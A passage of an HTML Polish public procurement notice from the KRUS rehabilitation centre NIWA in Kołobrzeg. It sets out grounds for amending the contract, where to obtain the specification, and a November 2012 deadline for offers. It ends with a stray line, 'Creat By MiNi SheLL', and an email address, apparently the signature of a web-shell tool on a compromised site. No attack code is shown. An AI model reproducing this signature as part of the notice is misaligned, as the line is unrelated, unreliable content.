<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia,
2)	wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy.
3)	W przypadku zmiany stawek podatku od towarów i usług (VAT), skutkujących koniecznością zmiany wynagrodzenia,
4)	Wystąpienia okoliczności,  których  nie można było przewidzieć na etapie sporządzania  SIWZ  i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niwa.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3; Dział Organizacyjny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.11.2012 godzina 12:30, miejsce: Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com